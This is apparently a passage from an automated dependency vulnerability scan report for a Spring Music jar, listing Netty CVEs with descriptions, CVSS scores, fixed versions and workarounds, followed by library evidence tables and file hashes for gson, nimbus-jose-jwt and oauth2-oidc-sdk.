af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - BROKEN_LINK cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,VENDOR_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT,RELEASE_NOTES cve@mitre.org - PRODUCT,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21290 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2025-25193 suppress
Netty, an asynchronous, event-driven network application framework, has a vulnerability in versions up to and including 4.1.118.Final. An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crash. A similar issue was previously reported as CVE-2024-47535. This issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit. Commit d1fbda62d3a47835d3fb35db8bd42ecc205a5386 contains an updated fix. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: nimbus-jose-jwt-10.3.1.jar (shaded: com.google.code.gson:gson:2.12.1)License:
Apache-2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/nimbus-jose-jwt-10.3.1.jar/META-INF/maven/com.google.code.gson/gson/pom.xml
MD5: 54205b633e8a676f5bb25c188631c854
SHA1: d2c3993ff96e5da39a57e5e0b695eda560949b57
SHA256: 0b5735ec85f45282f1e2c769779800427b150a8163f405093a9280b71cab1978
Evidence Type Source Name Value Confidence Vendor pom artifactid gson Low Vendor pom groupid com.google.code.gson Highest Vendor pom name Gson High Vendor pom parent-artifactid gson-parent Low Product pom artifactid gson Highest Product pom groupid com.google.code.gson Highest Product pom name Gson High Product pom parent-artifactid gson-parent Medium Version pom version 2.12.1 Highest
spring-music-sqldb-1.0.jar: nimbus-jose-jwt-10.3.1.jarDescription:
Java library for Javascript Object Signing and Encryption (JOSE) and
JSON Web Tokens (JWT)
License:
The Apache Software License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/nimbus-jose-jwt-10.3.1.jar
MD5: 735446acf5f7d08dc41c2815f27e0266
SHA1: 4ec9e53a1bb37626adfec4302e20c13d4e56c5bc
SHA256: d7919520ae9702ea06a23cc669c9ed1daa543d12a33a1be214a85b47dfc1c7c8
Evidence Type Source Name Value Confidence Vendor file name nimbus-jose-jwt High Vendor jar package name jose Highest Vendor jar package name jwt Highest Vendor jar package name nimbusds Highest Vendor Manifest build-date ${timestamp} Low Vendor Manifest build-jdk-spec 17 Low Vendor Manifest build-number ${buildNumber} Low Vendor Manifest build-tag 10.3.1 Low Vendor Manifest bundle-docurl https://connect2id.com Low Vendor Manifest bundle-symbolicname com.nimbusds.nimbus-jose-jwt Medium Vendor Manifest Implementation-Vendor Connect2id Ltd. High Vendor Manifest multi-release true Low Vendor Manifest specification-vendor Connect2id Ltd. Low Vendor pom artifactid nimbus-jose-jwt Low Vendor pom developer email vladimir@dzhuvinov.com Low Vendor pom developer id vdzhuvinov Medium Vendor pom developer name Vladimir Dzhuvinov Medium Vendor pom groupid com.nimbusds Highest Vendor pom name Nimbus JOSE+JWT High Vendor pom organization name Connect2id Ltd. High Vendor pom organization url https://connect2id.com Medium Vendor pom url https://bitbucket.org/connect2id/nimbus-jose-jwt Highest Product file name nimbus-jose-jwt High Product jar package name jose Highest Product jar package name jwt Highest Product jar package name nimbusds Highest Product Manifest build-date ${timestamp} Low Product Manifest build-jdk-spec 17 Low Product Manifest build-number ${buildNumber} Low Product Manifest build-tag 10.3.1 Low Product Manifest bundle-docurl https://connect2id.com Low Product Manifest Bundle-Name Nimbus JOSE+JWT Medium Product Manifest bundle-symbolicname com.nimbusds.nimbus-jose-jwt Medium Product Manifest Implementation-Title Nimbus JOSE+JWT High Product Manifest multi-release true Low Product Manifest specification-title Nimbus JOSE+JWT Medium Product pom artifactid nimbus-jose-jwt Highest Product pom developer email vladimir@dzhuvinov.com Low Product pom developer id vdzhuvinov Low Product pom developer name Vladimir Dzhuvinov Low Product pom groupid com.nimbusds Highest Product pom name Nimbus JOSE+JWT High Product pom organization name Connect2id Ltd. Low Product pom organization url https://connect2id.com Low Product pom url https://bitbucket.org/connect2id/nimbus-jose-jwt Medium Version file version 10.3.1 High Version Manifest build-tag 10.3.1 Low Version Manifest Bundle-Version 10.3.1 High Version Manifest Implementation-Version 10.3.1 High Version pom version 10.3.1 Highest
spring-music-sqldb-1.0.jar: oauth2-oidc-sdk-5.24.1.jarDescription:
OAuth 2.0 SDK with OpenID Connection extensions for developing
client and server applications.
License:
Apache License, version 2.0: http://www.apache.org/licenses/LICENSE-2.0.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/oauth2-oidc-sdk-5.24.1.jar
MD5: 1604afda5f300ebf1a039e99d8047e1c
SHA1: 33d72b291c44dc4b56d94e3456873edc7b3ce0d4
SHA256: 0441230ddb3ad1182554e2cd1f7233a776fcd51524e7bce1439607ce92714c8e
Evidence Type Source Name Value Confidence Vendor file name oauth2-oidc-sdk High Vendor jar package name client Highest Vendor jar package name connect Highest Vendor jar package name nimbusds Highest Vendor jar package name oauth2 Highest Vendor jar package name openid Highest Vendor jar package name sdk Highest Vendor Manifest build-date ${timestamp} Low Vendor Manifest build-number ${buildNumber} Low Vendor Manifest build-tag 5.24.1 Low Vendor Manifest bundle-docurl http://connect2id.com Low Vendor Manifest bundle-symbolicname oauth2-oidc-sdk Medium Vendor Manifest implementation-url https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions Low Vendor Manifest Implementation-Vendor Connect2id Ltd. High Vendor Manifest Implementation-Vendor-Id com.nimbusds Medium Vendor Manifest specification-vendor Connect2id Ltd. Low Vendor pom artifactid oauth2-oidc-sdk Low Vendor pom developer email vladimir@dzhuvinov.com Low Vendor pom developer id vdzhuvinov Medium Vendor pom developer name Vladimir Dzhuvinov Medium Vendor pom groupid com.nimbusds Highest Vendor pom name OAuth 2.0 SDK with OpenID Connect extensions High Vendor pom organization name Connect2id Ltd. High Vendor pom organization url http://connect2id.com Medium Vendor pom url https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions Highest Product file name oauth2-oidc-sdk High Product jar package name client Highest Product jar package name connect Highest Product jar package name http Highest Product jar package name nimbusds Highest Product jar package name oauth2 Highest Product jar package name openid Highest Product jar package name sdk Highest Product Manifest build-date ${timestamp} Low Product Manifest build-number ${buildNumber} Low Product Manifest build-tag 5.24.1 Low Product Manifest bundle-docurl http://connect2id.com Low Product Manifest Bundle-Name OAuth 2.0 SDK with OpenID Connect extensions Medium Product Manifest bundle-symbolicname oauth2-oidc-sdk Medium Product Manifest Implementation-Title OAuth 2.0 SDK with OpenID Connect extensions High Product Manifest implementation-url https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions Low Product Manifest specification-title OAuth 2.0 SDK with OpenID Connect extensions Medium Product pom artifactid oauth2-oidc-sdk Highest Product pom developer email vladimir@dzhuvinov.com Low Product pom developer id vdzhuvinov Low Product pom developer name 